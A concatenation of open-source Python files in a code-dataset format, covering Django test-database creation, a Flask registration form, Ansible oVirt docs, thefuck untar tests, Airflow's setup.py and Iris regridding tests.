Args:
path_finder: A network_util.PathFinder over the network.
"""
links = path_finder.GetAllConnections()
with open('full.dot', 'w') as f:
f.write('graph network {\n')
for link in links:
source = link[0].replace('.', '_')
dest = link[1].replace('.', '_')
f.write(' %s -- %s;\n' % (source, dest))
f.write('}\n')
print 'Wrote full.dot.'
with open('reduced.dot', 'w') as f:
f.write('graph network {\n')
for link in links:
re0 = r'switches.([a-z_0-9]+).[0-9]+'
re1 = r'aio_nodes\.([a-z_0-9]+)'
source = re.sub(re0, r'switch_\1', link[0])
source = re.sub(re1, r'\1', source)
dest = re.sub(re0, r'switch_\1', link[1])
dest = re.sub(re1, r'\1', dest)
if source != dest:
f.write(' %s -- %s;\n' % (source, dest))
f.write('}\n')
print 'Wrote reduced.dot.'
print('Now try e.g. \'fdp ./reduced.dot -Tpng:gd > reduced.png && '
'eog reduced.png\'')
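# Example invocation (file name illustrative):
#   ./network_routes.py --network_file=network.yaml --print_routes \
#       --write_dot_files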
def main(argv):
try:
argv = FLAGS(argv)
except gflags.FlagsError, e:
sys.stderr.write('\nError: %s\n\nUsage: %s ARGS\n%s\n'
% (e, argv[0], FLAGS))
sys.exit(1)
config = network_config.NetworkConfig(FLAGS.network_file)
message_types = config.all_messages
path_finder = network_util.PathFinder(config.GetSwitches(), message_types)
  if FLAGS.print_routes:
    forwarding_maps = network_util.MakeForwardingMaps(
        message_types, path_finder)
    _PrintMulticastRoutes(forwarding_maps)
if FLAGS.write_dot_files:
_WriteDotFiles(path_finder)
if __name__ == '__main__':
main(sys.argv)
| apache-2.0 |
kisna72/django | django/db/backends/base/creation.py | 147 | 10102 | import sys
import time
from django.apps import apps
from django.conf import settings
from django.core import serializers
from django.db import router
from django.utils.six import StringIO
from django.utils.six.moves import input
# The prefix to put on the default database name when creating
# the test database.
TEST_DATABASE_PREFIX = 'test_'
class BaseDatabaseCreation(object):
"""
This class encapsulates all backend-specific differences that pertain to
creation and destruction of the test database.
"""
def __init__(self, connection):
self.connection = connection
@property
def _nodb_connection(self):
"""
Used to be defined here, now moved to DatabaseWrapper.
"""
return self.connection._nodb_connection
def create_test_db(self, verbosity=1, autoclobber=False, serialize=True, keepdb=False):
"""
Creates a test database, prompting the user for confirmation if the
database already exists. Returns the name of the test database created.
"""
# Don't import django.core.management if it isn't needed.
from django.core.management import call_command
test_database_name = self._get_test_db_name()
if verbosity >= 1:
test_db_repr = ''
action = 'Creating'
if verbosity >= 2:
test_db_repr = " ('%s')" % test_database_name
if keepdb:
action = "Using existing"
print("%s test database for alias '%s'%s..." % (
action, self.connection.alias, test_db_repr))
# We could skip this call if keepdb is True, but we instead
# give it the keepdb param. This is to handle the case
# where the test DB doesn't exist, in which case we need to
# create it, then just not destroy it. If we instead skip
# this, we will get an exception.
self._create_test_db(verbosity, autoclobber, keepdb)
self.connection.close()
settings.DATABASES[self.connection.alias]["NAME"] = test_database_name
self.connection.settings_dict["NAME"] = test_database_name
# We report migrate messages at one level lower than that requested.
# This ensures we don't get flooded with messages during testing
# (unless you really ask to be flooded).
call_command(
'migrate',
verbosity=max(verbosity - 1, 0),
interactive=False,
database=self.connection.alias,
run_syncdb=True,
)
# We then serialize the current state of the database into a string
# and store it on the connection. This slightly horrific process is so people
# who are testing on databases without transactions or who are using
# a TransactionTestCase still get a clean database on every test run.
if serialize:
self.connection._test_serialized_contents = self.serialize_db_to_string()
call_command('createcachetable', database=self.connection.alias)
# Ensure a connection for the side effect of initializing the test database.
self.connection.ensure_connection()
return test_database_name
def set_as_test_mirror(self, primary_settings_dict):
"""
Set this database up to be used in testing as a mirror of a primary database
        whose settings are given.
"""
self.connection.settings_dict['NAME'] = primary_settings_dict['NAME']
def serialize_db_to_string(self):
"""
Serializes all data in the database into a JSON string.
Designed only for test runner usage; will not handle large
amounts of data.
"""
# Build list of all apps to serialize
from django.db.migrations.loader import MigrationLoader
loader = MigrationLoader(self.connection)
app_list = []
for app_config in apps.get_app_configs():
if (
app_config.models_module is not None and
app_config.label in loader.migrated_apps and
app_config.name not in settings.TEST_NON_SERIALIZED_APPS
):
app_list.append((app_config, None))
# Make a function to iteratively return every object
def get_objects():
for model in serializers.sort_dependencies(app_list):
if (model._meta.can_migrate(self.connection) and
router.allow_migrate_model(self.connection.alias, model)):
queryset = model._default_manager.using(self.connection.alias).order_by(model._meta.pk.name)
for obj in queryset.iterator():
yield obj
# Serialize to a string
out = StringIO()
serializers.serialize("json", get_objects(), indent=None, stream=out)
return out.getvalue()
def deserialize_db_from_string(self, data):
"""
Reloads the database with data from a string generated by
the serialize_db_to_string method.
"""
data = StringIO(data)
for obj in serializers.deserialize("json", data, using=self.connection.alias):
obj.save()
def _get_test_db_name(self):
"""
Internal implementation - returns the name of the test DB that will be
created. Only useful when called from create_test_db() and
_create_test_db() and when no external munging is done with the 'NAME'
or 'TEST_NAME' settings.
"""
if self.connection.settings_dict['TEST']['NAME']:
return self.connection.settings_dict['TEST']['NAME']
return TEST_DATABASE_PREFIX + self.connection.settings_dict['NAME']
def _create_test_db(self, verbosity, autoclobber, keepdb=False):
"""
Internal implementation - creates the test db tables.
"""
suffix = self.sql_table_creation_suffix()
test_database_name = self._get_test_db_name()
qn = self.connection.ops.quote_name
# Create the test database and connect to it.
with self._nodb_connection.cursor() as cursor:
try:
cursor.execute(
"CREATE DATABASE %s %s" % (qn(test_database_name), suffix))
except Exception as e:
# if we want to keep the db, then no need to do any of the below,
# just return and skip it all.
if keepdb:
return test_database_name
sys.stderr.write(
"Got an error creating the test database: %s\n" % e)
if not autoclobber:
confirm = input(
"Type 'yes' if you would like to try deleting the test "
"database '%s', or 'no' to cancel: " % test_database_name)
if autoclobber or confirm == 'yes':
try:
if verbosity >= 1:
print("Destroying old test database '%s'..."
% self.connection.alias)
cursor.execute(
"DROP DATABASE %s" % qn(test_database_name))
cursor.execute(
"CREATE DATABASE %s %s" % (qn(test_database_name),
suffix))
except Exception as e:
sys.stderr.write(
"Got an error recreating the test database: %s\n" % e)
sys.exit(2)
else:
print("Tests cancelled.")
sys.exit(1)
return test_database_name
def destroy_test_db(self, old_database_name, verbosity=1, keepdb=False):
"""
Destroy a test database, prompting the user for confirmation if the
database already exists.
"""
self.connection.close()
test_database_name = self.connection.settings_dict['NAME']
if verbosity >= 1:
test_db_repr = ''
action = 'Destroying'
if verbosity >= 2:
test_db_repr = " ('%s')" % test_database_name
if keepdb:
action = 'Preserving'
print("%s test database for alias '%s'%s..." % (
action, self.connection.alias, test_db_repr))
# if we want to preserve the database
# skip the actual destroying piece.
if not keepdb:
self._destroy_test_db(test_database_name, verbosity)
# Restore the original database name
settings.DATABASES[self.connection.alias]["NAME"] = old_database_name
self.connection.settings_dict["NAME"] = old_database_name
def _destroy_test_db(self, test_database_name, verbosity):
"""
Internal implementation - remove the test db tables.
"""
# Remove the test database to clean up after
# ourselves. Connect to the previous database (not the test database)
# to do so, because it's not allowed to delete a database while being
# connected to it.
with self.connection._nodb_connection.cursor() as cursor:
# Wait to avoid "database is being accessed by other users" errors.
time.sleep(1)
cursor.execute("DROP DATABASE %s"
% self.connection.ops.quote_name(test_database_name))
def sql_table_creation_suffix(self):
"""
SQL to append to the end of the test table creation statements.
"""
return ''
def test_db_signature(self):
"""
Returns a tuple with elements of self.connection.settings_dict (a
DATABASES setting value) that uniquely identify a database
accordingly to the RDBMS particularities.
"""
settings_dict = self.connection.settings_dict
return (
settings_dict['HOST'],
settings_dict['PORT'],
settings_dict['ENGINE'],
settings_dict['NAME']
)
| bsd-3-clause |
michaelrice/vBurgundy | vBurgundy/user/forms.py | 1 | 1679 | from flask_wtf import Form
from wtforms import PasswordField, StringField
from wtforms.validators import DataRequired, Email, EqualTo, Length
from .models import User
class RegisterForm(Form):
"""
Registration Form for new users.
"""
username = StringField('Username',
validators=[DataRequired(),
Length(min=3, max=25)])
email = StringField('Email',
validators=[DataRequired(),
Email(), Length(min=6, max=40)])
password = PasswordField('Password',
validators=[DataRequired(),
Length(min=6, max=40)])
confirm = PasswordField('Verify password',
[DataRequired(),
EqualTo('password',
message='Passwords must match')])
def __init__(self, *args, **kwargs):
super(RegisterForm, self).__init__(*args, **kwargs)
self.user = None
def validate(self):
"""
        Validate the form: check that the username and email are not
        already registered.
        :return: True if the submission describes a valid new user.
        :rtype: bool
"""
initial_validation = super(RegisterForm, self).validate()
if not initial_validation:
return False
user = User.query.filter_by(username=self.username.data).first()
if user:
self.username.errors.append("Username already registered")
return False
user = User.query.filter_by(email=self.email.data).first()
if user:
self.email.errors.append("Email already registered")
return False
        return True
| apache-2.0 |
caphrim007/ansible | lib/ansible/utils/module_docs_fragments/ovirt_facts.py | 33 | 3556 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2016 Red Hat, Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
class ModuleDocFragment(object):
# facts standard oVirt documentation fragment
DOCUMENTATION = '''
options:
fetch_nested:
description:
- "If I(True) the module will fetch additional data from the API."
- "It will fetch IDs of the VMs disks, snapshots, etc. User can configure to fetch other
attributes of the nested entities by specifying C(nested_attributes)."
version_added: "2.3"
type: bool
nested_attributes:
description:
- "Specifies list of the attributes which should be fetched from the API."
- "This parameter apply only when C(fetch_nested) is I(true)."
version_added: "2.3"
auth:
required: True
description:
- "Dictionary with values needed to create HTTP/HTTPS connection to oVirt:"
            - "C(username)[I(required)] - The name of the user, something like I(admin@internal).
              Default value is set by I(OVIRT_USERNAME) environment variable."
- "C(password)[I(required)] - The password of the user. Default value is set by I(OVIRT_PASSWORD) environment variable."
- "C(url)- A string containing the API URL of the server, usually
something like `I(https://server.example.com/ovirt-engine/api)`. Default value is set by I(OVIRT_URL) environment variable.
Either C(url) or C(hostname) is required."
- "C(hostname) - A string containing the hostname of the server, usually
something like `I(server.example.com)`. Default value is set by I(OVIRT_HOSTNAME) environment variable.
Either C(url) or C(hostname) is required."
- "C(token) - Token to be used instead of login with username/password. Default value is set by I(OVIRT_TOKEN) environment variable."
- "C(insecure) - A boolean flag that indicates if the server TLS
certificate and host name should be checked."
- "C(ca_file) - A PEM file containing the trusted CA certificates. The
certificate presented by the server will be verified using these CA
certificates. If `C(ca_file)` parameter is not set, system wide
CA certificate store is used. Default value is set by I(OVIRT_CAFILE) environment variable."
- "C(kerberos) - A boolean flag indicating if Kerberos authentication
should be used instead of the default basic authentication."
- "C(headers) - Dictionary of HTTP headers to be added to each API call."
requirements:
- python >= 2.7
- ovirt-engine-sdk-python >= 4.2.4
notes:
- "In order to use this module you have to install oVirt Python SDK.
To ensure it's installed with correct version you can create the following task:
pip: name=ovirt-engine-sdk-python version=4.2.4"
'''
| gpl-3.0 |
bugaevc/thefuck | tests/rules/test_dirty_untar.py | 5 | 1795 | import os
import pytest
import tarfile
from thefuck.rules.dirty_untar import match, get_new_command, side_effect
from tests.utils import Command
@pytest.fixture
def tar_error(tmpdir):
def fixture(filename):
path = os.path.join(str(tmpdir), filename)
def reset(path):
with tarfile.TarFile(path, 'w') as archive:
for file in ('a', 'b', 'c'):
with open(file, 'w') as f:
f.write('*')
archive.add(file)
os.remove(file)
with tarfile.TarFile(path, 'r') as archive:
archive.extractall()
os.chdir(str(tmpdir))
reset(path)
assert(set(os.listdir('.')) == {filename, 'a', 'b', 'c'})
return fixture
parametrize_filename = pytest.mark.parametrize('filename', [
'foo.tar',
'foo.tar.gz',
'foo.tgz'])
parametrize_script = pytest.mark.parametrize('script, fixed', [
('tar xvf {}', 'mkdir -p foo && tar xvf {} -C foo'),
('tar -xvf {}', 'mkdir -p foo && tar -xvf {} -C foo'),
('tar --extract -f {}', 'mkdir -p foo && tar --extract -f {} -C foo')])
@parametrize_filename
@parametrize_script
def test_match(tar_error, filename, script, fixed):
tar_error(filename)
assert match(Command(script=script.format(filename)), None)
@parametrize_filename
@parametrize_script
def test_side_effect(tar_error, filename, script, fixed):
tar_error(filename)
side_effect(Command(script=script.format(filename)), None)
assert(os.listdir('.') == [filename])
@parametrize_filename
@parametrize_script
def test_get_new_command(tar_error, filename, script, fixed):
tar_error(filename)
assert get_new_command(Command(script=script.format(filename)), None) == fixed.format(filename)
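# Net effect illustrated by the parametrized cases above: after side_effect()
# removes the stray extracted files, a dirty `tar xvf foo.tar` is re-run as
# `mkdir -p foo && tar xvf foo.tar -C foo`.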
| mit |
gritlogic/incubator-airflow | setup.py | 1 | 9028 | # -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from setuptools import setup, find_packages, Command
from setuptools.command.test import test as TestCommand
import imp
import logging
import os
import sys
logger = logging.getLogger(__name__)
# Kept manually in sync with airflow.__version__
version = imp.load_source(
'airflow.version', os.path.join('airflow', 'version.py')).version
class Tox(TestCommand):
user_options = [('tox-args=', None, "Arguments to pass to tox")]
def initialize_options(self):
TestCommand.initialize_options(self)
self.tox_args = ''
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
#import here, cause outside the eggs aren't loaded
import tox
errno = tox.cmdline(args=self.tox_args.split())
sys.exit(errno)
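# Registered below via cmdclass as the `test` command, e.g. (tox environment
# name illustrative):
#   python setup.py test --tox-args='-e py27'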
class CleanCommand(Command):
"""Custom clean command to tidy up the project root."""
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
os.system('rm -vrf ./build ./dist ./*.pyc ./*.tgz ./*.egg-info')
def git_version(version):
"""
Return a version to identify the state of the underlying git repo. The version will
indicate whether the head of the current git-backed working directory is tied to a
release tag or not : it will indicate the former with a 'release:{version}' prefix
and the latter with a 'dev0' prefix. Following the prefix will be a sha of the current
branch head. Finally, a "dirty" suffix is appended to indicate that uncommitted changes
are present.
"""
repo = None
try:
import git
repo = git.Repo('.git')
except ImportError:
logger.warn('gitpython not found: Cannot compute the git version.')
return ''
except Exception as e:
logger.warn('Git repo not found: Cannot compute the git version.')
return ''
if repo:
sha = repo.head.commit.hexsha
if repo.is_dirty():
return '.dev0+{sha}.dirty'.format(sha=sha)
# commit is clean
# is it release of `version` ?
try:
tag = repo.git.describe(
match='[0-9]*', exact_match=True,
tags=True, dirty=True)
assert tag == version, (tag, version)
return '.release:{version}+{sha}'.format(version=version,
sha=sha)
except git.GitCommandError:
return '.dev0+{sha}'.format(sha=sha)
else:
return 'no_git_version'
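# Illustrative version suffixes produced above (sha shortened):
#   '.release:1.8.0+1a2b3c'   clean checkout of the matching release tag
#   '.dev0+1a2b3c'            clean commit without a matching release tag
#   '.dev0+1a2b3c.dirty'      uncommitted changes in the working tree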
def write_version(filename=os.path.join(*['airflow',
'git_version'])):
text = "{}".format(git_version(version))
with open(filename, 'w') as a:
a.write(text)
async = [
'greenlet>=0.4.9',
'eventlet>= 0.9.7',
'gevent>=0.13'
]
celery = [
'celery>=3.1.17',
'flower>=0.7.3'
]
cgroups = [
'cgroupspy>=0.1.4',
]
crypto = ['cryptography>=0.9.3']
datadog = ['datadog>=0.14.0']
doc = [
'sphinx>=1.2.3',
'sphinx-argparse>=0.1.13',
'sphinx-rtd-theme>=0.1.6',
'Sphinx-PyPI-upload>=0.2.1'
]
docker = ['docker-py>=1.6.0']
druid = ['pydruid>=0.2.1']
emr = ['boto3>=1.0.0']
gcp_api = [
'httplib2',
'google-api-python-client>=1.5.0, <1.6.0',
'oauth2client>=2.0.2, <2.1.0',
'PyOpenSSL',
]
hdfs = ['snakebite>=2.7.8']
webhdfs = ['hdfs[dataframe,avro,kerberos]>=2.0.4']
jira = ['JIRA>1.0.7']
hive = [
'hive-thrift-py>=0.0.1',
'pyhive>=0.1.3',
'impyla>=0.13.3',
'unicodecsv>=0.14.1'
]
jdbc = ['jaydebeapi>=0.2.0']
mssql = ['pymssql>=2.1.1', 'unicodecsv>=0.14.1']
mysql = ['mysqlclient>=1.3.6']
rabbitmq = ['librabbitmq>=1.6.1']
oracle = ['cx_Oracle>=5.1.2']
postgres = ['psycopg2>=2.6']
salesforce = ['simple-salesforce>=0.72']
s3 = [
'boto>=2.36.0',
'filechunkio>=1.6',
]
samba = ['pysmbclient>=0.1.3']
slack = ['slackclient>=1.0.0']
statsd = ['statsd>=3.0.1, <4.0']
vertica = ['vertica-python>=0.5.1']
ldap = ['ldap3>=0.9.9.1']
kerberos = ['pykerberos>=1.1.13',
'requests_kerberos>=0.10.0',
'thrift_sasl>=0.2.0',
'snakebite[kerberos]>=2.7.8',
'kerberos>=1.2.5']
password = [
'bcrypt>=2.0.0',
'flask-bcrypt>=0.7.1',
]
github_enterprise = ['Flask-OAuthlib>=0.9.1']
qds = ['qds-sdk>=1.9.0']
cloudant = ['cloudant>=0.5.9,<2.0'] # major update coming soon, clamp to 0.x
all_dbs = postgres + mysql + hive + mssql + hdfs + vertica + cloudant
devel = [
'click',
'freezegun',
'jira',
'lxml>=3.3.4',
'mock',
'moto',
'nose',
'nose-ignore-docstring==0.2',
'nose-parameterized',
]
devel_minreq = devel + mysql + doc + password + s3 + cgroups
devel_hadoop = devel_minreq + hive + hdfs + webhdfs + kerberos
devel_all = devel + all_dbs + doc + samba + s3 + slack + crypto + oracle + docker
def do_setup():
write_version()
setup(
name='airflow',
description='Programmatically author, schedule and monitor data pipelines',
license='Apache License 2.0',
version=version,
packages=find_packages(),
package_data={'': ['airflow/alembic.ini', "airflow/git_version"]},
include_package_data=True,
zip_safe=False,
scripts=['airflow/bin/airflow'],
install_requires=[
'alembic>=0.8.3, <0.9',
'croniter>=0.3.8, <0.4',
'dill>=0.2.2, <0.3',
'flask>=0.11, <0.12',
'flask-admin==1.4.1',
'flask-cache>=0.13.1, <0.14',
'flask-login==0.2.11',
'flask-swagger==0.2.13',
'flask-wtf==0.12',
'funcsigs==1.0.0',
'future>=0.15.0, <0.16',
'gitpython>=2.0.2',
'gunicorn>=19.3.0, <19.4.0', # 19.4.? seemed to have issues
'jinja2>=2.7.3, <2.9.0',
'lxml>=3.6.0, <4.0',
'markdown>=2.5.2, <3.0',
'pandas>=0.17.1, <1.0.0',
'psutil>=4.2.0, <5.0.0',
'pygments>=2.0.1, <3.0',
'python-daemon>=2.1.1, <2.2',
'python-dateutil>=2.3, <3',
'python-nvd3==0.14.2',
'requests>=2.5.1, <3',
'setproctitle>=1.1.8, <2',
'sqlalchemy>=0.9.8',
'tabulate>=0.7.5, <0.8.0',
'thrift>=0.9.2, <0.10',
'zope.deprecation>=4.0, <5.0',
],
extras_require={
'all': devel_all,
'all_dbs': all_dbs,
'async': async,
'celery': celery,
'cgroups': cgroups,
'cloudant': cloudant,
'crypto': crypto,
'datadog': datadog,
'devel': devel_minreq,
'devel_hadoop': devel_hadoop,
'doc': doc,
'docker': docker,
'druid': druid,
'emr': emr,
'gcp_api': gcp_api,
'github_enterprise': github_enterprise,
'hdfs': hdfs,
'hive': hive,
'jdbc': jdbc,
'kerberos': kerberos,
'ldap': ldap,
'mssql': mssql,
'mysql': mysql,
'oracle': oracle,
'password': password,
'postgres': postgres,
'qds': qds,
'rabbitmq': rabbitmq,
's3': s3,
'salesforce': salesforce,
'samba': samba,
'slack': slack,
'statsd': statsd,
'vertica': vertica,
'webhdfs': webhdfs,
'jira': jira,
},
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Console',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.4',
'Topic :: System :: Monitoring',
],
author='Maxime Beauchemin',
author_email='[email protected]',
url='https://github.com/apache/incubator-airflow',
download_url=(
'https://github.com/apache/incubator-airflow/tarball/' + version),
cmdclass={
'test': Tox,
'extra_clean': CleanCommand,
},
)
if __name__ == "__main__":
do_setup()
| apache-2.0 |
ajdawson/iris | lib/iris/tests/integration/test_regrid_equivalence.py | 6 | 10809 | # (C) British Crown Copyright 2016, Met Office
#
# This file is part of Iris.
#
# Iris is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Iris is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Iris. If not, see <http://www.gnu.org/licenses/>.
"""
Tests to check the validity of replacing
"iris.analysis._interpolate.regrid`('nearest')" with
"iris.cube.Cube.regrid(scheme=iris.analysis.Nearest())".
"""
from __future__ import (absolute_import, division, print_function)
from six.moves import (filter, input, map, range, zip) # noqa
# Import iris.tests first so that some things can be initialised before
# importing anything else.
import iris.tests as tests
import numpy as np
import iris
from iris.analysis._interpolate_private import regrid
from iris.analysis import Nearest
from iris.cube import Cube
from iris.coords import AuxCoord, DimCoord
def grid_cube(xx, yy, data=None):
nx, ny = len(xx), len(yy)
if data is not None:
data = np.array(data).reshape((ny, nx))
else:
data = np.zeros((ny, nx))
cube = Cube(data)
y_coord = DimCoord(yy, standard_name='latitude', units='degrees')
x_coord = DimCoord(xx, standard_name='longitude', units='degrees')
cube.add_dim_coord(y_coord, 0)
cube.add_dim_coord(x_coord, 1)
return cube
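# e.g. grid_cube([0., 10.], [45., 55.]) yields a 2x2 cube of zeros with
# longitude points [0, 10] and latitude points [45, 55], both in degrees.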
ENABLE_DEBUG_OUTPUT = False
def _debug_data(cube, test_id):
if ENABLE_DEBUG_OUTPUT:
        print()
data = cube.data
print('CUBE: {}'.format(test_id))
print(' x={!r}'.format(cube.coord('longitude').points))
print(' y={!r}'.format(cube.coord('latitude').points))
print('data[{}]:'.format(type(data)))
print(repr(data))
class MixinCheckingCode(object):
def test_basic(self):
src_x = [30., 40., 50.]
dst_x = [32., 42.]
src_y = [-10., 0., 10.]
dst_y = [-8., 2.]
data = [[3., 4., 5.],
[23., 24., 25.],
[43., 44., 45.]]
expected_result = [[3., 4.],
[23., 24.]]
src_cube = grid_cube(src_x, src_y, data)
_debug_data(src_cube, "basic SOURCE")
dst_cube = grid_cube(dst_x, dst_y)
result_cube = self.regrid(src_cube, dst_cube)
_debug_data(result_cube, "basic RESULT")
self.assertArrayAllClose(result_cube.data, expected_result)
def test_src_extrapolation(self):
src_x = [30., 40., 50.]
dst_x = [0., 29.0, 39.0]
src_y = [-10., 0., 10.]
dst_y = [-50., -9., -1.]
data = [[3., 4., 5.],
[23., 24., 25.],
[43., 44., 45.]]
expected_result = [[3., 3., 4.],
[3., 3., 4.],
[23., 23., 24.]]
src_cube = grid_cube(src_x, src_y, data)
_debug_data(src_cube, "extrapolate SOURCE")
dst_cube = grid_cube(dst_x, dst_y)
result_cube = self.regrid(src_cube, dst_cube)
_debug_data(result_cube, "extrapolate RESULT")
self.assertArrayAllClose(result_cube.data, expected_result)
def test_exact_matching_points(self):
src_x = [10.0, 20.0, 30.0]
src_y = [10.0, 20.0, 30.0]
dst_x = [14.9, 15.1, 20.0, 24.9, 25.1]
dst_y = [14.9, 15.1, 20.0, 24.9, 25.1]
data = [[3., 4., 5.],
[23., 24., 25.],
[43., 44., 45.]]
expected_result = [[3., 4., 4., 4., 5.],
[23., 24., 24., 24., 25.],
[23., 24., 24., 24., 25.],
[23., 24., 24., 24., 25.],
[43., 44., 44., 44., 45.]]
src_cube = grid_cube(src_x, src_y, data)
_debug_data(src_cube, "matching SOURCE")
dst_cube = grid_cube(dst_x, dst_y)
result_cube = self.regrid(src_cube, dst_cube)
_debug_data(result_cube, "matching RESULt")
self.assertArrayAllClose(result_cube.data, expected_result)
def test_source_mask(self):
src_x = [40.0, 50.0, 60.0]
src_y = [40.0, 50.0, 60.0]
dst_x = [44.99, 45.01, 48.0, 50.0, 52.0, 54.99, 55.01]
dst_y = [44.99, 45.01, 48.0, 50.0, 52.0, 54.99, 55.01]
data = np.ma.masked_equal([[3., 4., 5.],
[23., 999, 25.],
[43., 44., 45.]],
999)
expected_result = np.ma.masked_equal(
[[3., 4., 4., 4., 4., 4., 5.],
[23., 999, 999, 999, 999, 999, 25.],
[23., 999, 999, 999, 999, 999, 25.],
[23., 999, 999, 999, 999, 999, 25.],
[23., 999, 999, 999, 999, 999, 25.],
[23., 999, 999, 999, 999, 999, 25.],
[43., 44., 44., 44., 44., 44., 45.]],
999)
src_cube = grid_cube(src_x, src_y, data)
src_cube.data = np.ma.masked_array(src_cube.data)
src_cube.data[1, 1] = np.ma.masked
_debug_data(src_cube, "masked SOURCE")
dst_cube = grid_cube(dst_x, dst_y)
result_cube = self.regrid(src_cube, dst_cube,
translate_nans_to_mask=True)
_debug_data(result_cube, "masked RESULT")
self.assertMaskedArrayEqual(result_cube.data, expected_result)
def test_wrapping_non_circular(self):
src_x = [-10., 0., 10.]
dst_x = [-360.0, -170., -1.0, 1.0, 50.0, 170.0, 352.0, 720.0]
src_y = [0., 10.]
dst_y = [0., 10.]
data = [[3., 4., 5.],
[3., 4., 5.]]
src_cube = grid_cube(src_x, src_y, data)
dst_cube = grid_cube(dst_x, dst_y)
# Account for a behavioural difference in this case :
# The Nearest scheme does wrapping of modular coordinate values.
# Thus target of 352.0 --> -8.0, which is nearest to -10.
# This looks just like "circular" handling, but only because it happens
# to produce the same results *for nearest-neighbour in particular*.
if isinstance(self, TestInterpolateRegridNearest):
# interpolate.regrid --> Wrapping-free results (non-circular).
expected_result = [[3., 3., 4., 4., 5., 5., 5., 5.],
[3., 3., 4., 4., 5., 5., 5., 5.]]
else:
# cube regrid --> Wrapped results.
expected_result = [[4., 3., 4., 4., 5., 5., 3., 4.],
[4., 3., 4., 4., 5., 5., 3., 4.]]
_debug_data(src_cube, "noncircular SOURCE")
result_cube = self.regrid(src_cube, dst_cube)
_debug_data(result_cube, "noncircular RESULT")
self.assertArrayAllClose(result_cube.data, expected_result)
def test_wrapping_circular(self):
# When x-coord is "circular", the above distinction does not apply :
# results are the same for both calculations.
src_x = [-10., 0., 10.]
dst_x = [-360.0, -170., -1.0, 1.0, 50.0, 170.0, 352.0, 720.0]
src_y = [0., 10.]
dst_y = [0., 10.]
data = [[3., 4., 5.],
[3., 4., 5.]]
src_cube = grid_cube(src_x, src_y, data)
dst_cube = grid_cube(dst_x, dst_y)
src_cube.coord('longitude').circular = True
expected_result = [[4., 3., 4., 4., 5., 5., 3., 4.],
[4., 3., 4., 4., 5., 5., 3., 4.]]
_debug_data(src_cube, "circular SOURCE")
result_cube = self.regrid(src_cube, dst_cube)
_debug_data(result_cube, "circular RESULT")
self.assertArrayAllClose(result_cube.data, expected_result)
def test_wrapping_non_angular(self):
src_x = [-10., 0., 10.]
dst_x = [-360.0, -170., -1.0, 1.0, 50.0, 170.0, 352.0, 720.0]
src_y = [0., 10.]
dst_y = [0., 10.]
data = [[3., 4., 5.],
[3., 4., 5.]]
src_cube = grid_cube(src_x, src_y, data)
dst_cube = grid_cube(dst_x, dst_y)
for co_name in ('longitude', 'latitude'):
for cube in (src_cube, dst_cube):
coord = cube.coord(co_name)
coord.coord_system = None
coord.convert_units('1')
# interpolate.regrid --> Wrapping-free results (non-circular).
expected_result = [[3., 3., 4., 4., 5., 5., 5., 5.],
[3., 3., 4., 4., 5., 5., 5., 5.]]
_debug_data(src_cube, "non-angle-lons SOURCE")
result_cube = self.regrid(src_cube, dst_cube)
_debug_data(result_cube, "non-angle-lons RESULT")
self.assertArrayAllClose(result_cube.data, expected_result)
def test_source_nan(self):
src_x = [40.0, 50.0, 60.0]
src_y = [40.0, 50.0, 60.0]
dst_x = [44.99, 45.01, 48.0, 50.0, 52.0, 54.99, 55.01]
dst_y = [44.99, 45.01, 48.0, 50.0, 52.0, 54.99, 55.01]
nan = np.nan
data = [[3., 4., 5.],
[23., nan, 25.],
[43., 44., 45.]]
expected_result = [[3., 4., 4., 4., 4., 4., 5.],
[23., nan, nan, nan, nan, nan, 25.],
[23., nan, nan, nan, nan, nan, 25.],
[23., nan, nan, nan, nan, nan, 25.],
[23., nan, nan, nan, nan, nan, 25.],
[23., nan, nan, nan, nan, nan, 25.],
[43., 44., 44., 44., 44., 44., 45.]]
src_cube = grid_cube(src_x, src_y, data)
_debug_data(src_cube, "nan SOURCE")
dst_cube = grid_cube(dst_x, dst_y)
result_cube = self.regrid(src_cube, dst_cube)
_debug_data(result_cube, "nan RESULT")
self.assertArrayEqual(result_cube.data, expected_result)
# perform identical tests on the old + new approaches
class TestInterpolateRegridNearest(MixinCheckingCode, tests.IrisTest):
def regrid(self, src_cube, dst_cube,
translate_nans_to_mask=False, **kwargs):
result = regrid(src_cube, dst_cube, mode='nearest')
data = result.data
if translate_nans_to_mask and np.any(np.isnan(data)):
data = np.ma.masked_array(data, mask=np.isnan(data))
result.data = data
return result
class TestCubeRegridNearest(MixinCheckingCode, tests.IrisTest):
scheme = Nearest(extrapolation_mode='extrapolate')
def regrid(self, src_cube, dst_cube, **kwargs):
return src_cube.regrid(dst_cube, scheme=self.scheme)
if __name__ == '__main__':
tests.main()
| gpl-3.0 |
cpennington/edx-platform | lms/djangoapps/grades/config/waffle.py | 4 | 2419 | """
This module contains various configuration settings via
